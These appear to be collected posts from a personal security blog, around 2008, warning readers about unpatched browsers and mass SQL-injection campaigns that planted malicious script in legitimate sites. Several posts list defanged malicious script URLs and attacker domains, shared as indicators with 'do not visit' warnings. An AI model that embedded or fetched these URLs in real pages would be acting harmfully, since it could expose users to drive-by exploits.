Computer Security Weblog

Read this story on usatoday.com basically backing up why bad guys can take advantage of millions of web surfers out there.  Click here for the usatoday story.  I guess I should not complain because this reinforces why I feel that I have job security.  Anyway, here are the scary stats.  If you get one thing out of this posting, please use a patched browser.  Patching is one of the simplest things to do but so many don’t do it for one reason or another.

here is an excerpt from a story linked from the usatoday.com article.  This is from the website securitywatch.eweek.com:

While many of us will spend the better part of our adult lives sitting at computers, and more specifically keeping our eyes trained on the cyber-crime ecosystem, can we really expect people who do not to constantly remember to go download new software releases?

According to the researchers, “at most 83.3 percent of Firefox users, 65.3 percent of Safari users, 56.1 percent of Opera users and 47.6 percent of Internet Explorer users were using the latest, most secure browser version on any day between January 2007 [and] June 2008.”

The Firefox number is actually quite surprising. The idea that less than 50 percent of the estimated 577 million people using IE are not on current versions really is not. Firefox users tend to be more technically savvy, as many have specifically sought out the browsers for themselves. Most of the people using IE have it installed on their machines by default.

Based on this information, it’s no wonder why the criminal attacker is so successful.  I’m thinking about downloading Opera and testing it as another more secure browser.  I use Firefox along with add on’s to improve my security.  No way can you be 100 % secure.  There will always be those zero-day attacks that no patching can help.  Responding quickly to vulnerabilities is the reason why I use the Ubuntu operating system.

That is it for this post.  Lots of fireworks going off tonight, so the high price of gas hasn’t slowed too many folks from buying fireworks.  Sure has affected me and my 4th of July spending habits.  Have a great Thursday and stay safe.

The Shadowserver.org does great work and informs the security community on the darker side of the Internet. In their most recent posting, they have listed the sites that are serving up the malicious content. Here is the list of sites and the number of sites injected with each of these malicious domains.  Please be advised….DO NOT VISIT ANY OF THESE SITES.

I work in computer security.  We see a lot of attacks from some bad people.  What trends are we seeing and what will attacks look like in the near future?  Here are my thoughts.  I read a lot of tech sites, I listen to tech podcasts, and you hear a lot of opinions.  The biggest trend this year will be legitimate sites being hacked and malicious code actually injected into them so they actually serve up attacks on unknowing visitors.

We started seeing this trend in early 2007 with the Super Bowl from Dolphin’s Stadium.  Then it got quiet until the end of the year and then things have picked up.  Things are going to get worse.  Malicious tool kits can be bought on the Internet and you can change the attacks as new ones are found and old ones are patched.  This attack vector very efficient.  Some attacks can affect hundreds of thousands of pages in a short period of time.

What is going to come in the not so far future in computer security?  I believe those who say that different types of hardware other than the actual PC will be targeted soon.  Routers being controlled by attackers who can use a form of DNS poisoning where they can direct you to their bad paypal.com.  You won’t be able to tell you aren’t really on the real paypal.com site.  These hardware devices need to be secured and upgraded with security updates too.  Let me ask you a question about your router you use in your home.  When was the last time logged into that wireless router you own and update the firmware?  Never?  I’m sure there have been updates.  Learn how to maintain all devices that you have.

I feel pretty secure surfing the web but I take steps avoid going to places and I use as many things to help defend against those evil criminal attackers out on the Internet.  Patch.  It’s simple and a huge step in the right direction.  I read a lot.  I try sharing it with you.  The common man or woman does not keep up with all the threats out there.  The one resource I would start to read is the Internet Storm Center.  They are sort of a warehouse of information relating to threats on the net and what you can do to protect yourself.

That is it for now.  The weekend is getting so close I can taste it.  Stay safe and have a happy Thursday.

Most of the time, attacks from the Internet are silent.  You may not have realized that clicking on your favorite web site silently redirected you to a server in China and then exploits from Microsoft’s Internet Explorer, Firefox, QuickTime, Realplayer, and other applications are run on your PC. If you haven’t patched all your software, some bad guy attacker might just be able to take control of your machine and then be able to execute code remotely.  Those are words you really don’t want to hear.

Eventually, your anti-virus vendor gets the signatures of the bad software loaded on your machine and can clean it off.  But how did it get there?  What do I use my PC for?  Do I bank online?  Do I access my investment accounts online?  Do I store personal information about myself or my family in a document saved on the PC’s hard drive?  Then you need to take steps in trying to figure out just what happened.

First of all, is your software patched?  If not, then download your patches from Microsoft, Apple, RealPlayer, or any other applications and apply those security patches.  Set up a process in making sure your PC is scanned regularly and you check for patches regularly.

Can you find out if sites you visit have been hacked?  Sometimes you won’t know unless you really follow stories posted online.  If it is a big name site like CNN.com or USAToday.com, then you might know.  Hundreds of thousands of sites get hacked and you never really know.  You could possibly defend against these attacks by using a tool called NoScript with your Firefox browser.

Do you store passwords for sites so when you browse to them?  Are any of those holding a credit card of yours?  If you’ve read my blog much, I advise you not use the function that will remember passwords to sites.

One thing you will have to remember.  The Internet was not set up to handle secure transactions.  It was set up to share information.  Bad guys are taking advantage of all the vulnerabilities out there.  I can not guarantee you will be completely safe even following all these steps.  You can follow best practices and be safer than the average person.  If you have teenagers, your battle will be an uphill fight.  Teenagers trust everyone.  Clicking things that need not be clicked.  Think about having a computer you adults use, then one that the teenagers use.  You’ll still have to fight off attacks on the teenagers PC.

Good luck and stay safe.  I’m ready for SUMMER!!!

Yep, you are reading that headline right. Yet another code injection attack that is new. Just prior to writing this post, it showed 855,000 pages infected with some malicious (BAD!!) code that was injected into legitimate sites. NoScript is one defense, since this code is hosted on another domain.

The attack that I wrote about that started last week just hasn’t really taken off. Doing a Google search shows 25,500 pages that were affected by this one. It is early in the game for both of these attacks so more details will come out later. I’ll do more checking on the current attacks to see where those bad sites are being hosted.

The two sites in this new attack are listed below.  I’ve altered the URL.  My advice is NOT to go to either of these sites.

hxxp://free.hostpinoy.info/f.js
hxxp://xprmn4u.info/f.js

Stay safe and HAPPY MOTHER’S DAY!!!

Well it doesn’t appear that this attack is spreading. I just did a Google search on one of the redirect domains and it showed only 14,000 pages. Not as efficient as the last one that blasted several hundred thousand pages. Still see some of the same names on this list and it seems that the smaller organizations who probably don’t have full time staff to work on them and may not even know their sites have been compromised. Here is a short list of a few of the domains that still are making an appearance in Google. Remember that they may have been cleaned and Google hasn’t caught up with their spiders.

hxxp://www.wiredseniors.com

hxxp://www.moviesunlimited.com

hxxp://www.seniorstravelguide.com

hxxp://www.cancerissues.com

hxxp://www.reducecholesterol.org

hxxp://www.coloradowheelchairsports.org

hxxp://www.peta.org    (All you PETA freaks can still go there though.  Happy Surfing.  All my friends stay clear)

hxxp://www.seniorshomeexchange.com

hxxp://www.adhdissues.com

hxxp://www.goodtime-tickets.com

hxxp://www.matcmadison.edu

hxxp://www.coolbuddy.com

I’ll give an update on this if things pick up.  If you want to see the number of sites infected Google with

winzipices.cn and you’ll get a pretty long list.  Stay away unless you want your PC compromised.  Stay safe and take care.

I don’t have a lot of information at this time other than it appears that there is another SQL injection attack similar to the attacks we’ve seen where legitimate sites are redirecting to sites in China that are then launching different attacks that can compromise a machine. It may take a few days but there will be more information coming out about the details of this attack but at this time, there isn’t a lot out there. If you want to read more, you can go to the Internet Storm Center page by clicking here and reading what they know.

As more information becomes available, I’ll post another story. Take care and have a safe week!

Stories last week came out that the folks in Redwood had a closed door meeting with law enforcement. Here is an excerpt about this story.

Botnet fighters have another tool in their arsenal, thanks to the folks at Microsoft. The software vendor is giving law enforcers access to a special tool that keeps tabs on botnets, using data compiled from the 450 million computer users who have installed the Malicious Software Removal tool that ships with Windows. Although Microsoft is reluctant to give out details on its botnet buster — the company said that even revealing its name could give cyber criminals a clue on how to thwart it.

Microsoft company executives discussed it at a closed door conference held for law enforcement professionals Monday. The tool includes data and software that helps law enforcers get a better picture of the data being provided by Microsoft’s users, said Tim Cranton, associate general counsel with Microsoft’s World Wide Internet Safety Programs. “I think of it … as botnet intelligence,” he said.

Kind of cool I thought. But makes one wonder how much information Microsoft is keeping on it’s customers which are the majority of the folks online.

Stay safe and have a great week!!

Well this past week, another large scale hacking of legitimate sites including some belonging to the UN, the UK government, .edu sites, and many travel sites to name just a few.  The hack includes a re-direct that pointed visitors to the exploited sites to some servers in China and ran 8 exploits including MS07-004 for IE.  This has now become a more common exploit that attacks trusted sites then it can direct it to the criminal attackers bad websites.  The two sites it pointed to were IP’s that belonged to China.  Surprise!

Just do a Google search with these sites and you will see how wide spread the problem is.  Search on these but don’t go to any of these sites.   nihaorr1.com, and haoliuliang.net.

The lessons learned here are these.  No longer can we say there is something called trusted sites.  I use the Firefox browser and use an add-on called “NoScript”.  Check it out.  It allows you to control what JavaScript runs and what doesn’t.  And of course patching is VERY important.  Patch your Microsoft software, your Firefox browser, QuickTime, iTunes, RealPlayer, WinZip, Adobe Reader, Adobe Flash, and any other software that you use.  Here are the facts.  Due to crappy programming, the Computer Security field is going strong.  This is the core problem.  Not any easy answers here to solve but you can doe the things mentioned above.

Stay safe out there and I’ll be posting another story later this weekend.  I’ve been busy and haven’t had too much time.  We have been tracking this particular story where I work and I wanted to pass this along to you also.  Rock Chalk Jayhawk GO KU!!!  And remember, North Carolina Tarheel fans don’t have to listen to any of my advice.

A common question I ask when giving presentations on computer security, I ask how many people have changed their password for the personal e-mail accounts in the past year.  In the corporate world, you can control how often a user has to change their corporate password at work.  Most answers I get back from the question about their personal password on their e-mail accounts is that they never have or maybe one time they did a couple of years ago.

Now lets think about an attacker who compromises your home PC.  He has a keylogger (a program that records a users keystrokes and sends them back to an attackers evil server) and they have recorded you typing your personal e-mail account.  OK, now lets think.  If you happen to bank at a large national bank, you have a PayPal account, you have an eBay account and many other common online accounts that a criminal attacker might be able to take over for his nefarious activities.  Do you have user name and passwords that are common to your personal e-mail account?  Am I making you think about changing your password and using different user names and passwords for other accounts?  Hopefully so.

Lesson learned here is to change your password and don’t share user names and passwords with other financial accounts that you might have.  Think about using a strong password by using upper, lower, numbers and special characters to create a strong password.  Use a password that is actually longer than 8 positions long.  Use something like a pass phrase that will be easier for you to remember.

Hope everyone’s weekend is going great and stay safe out there.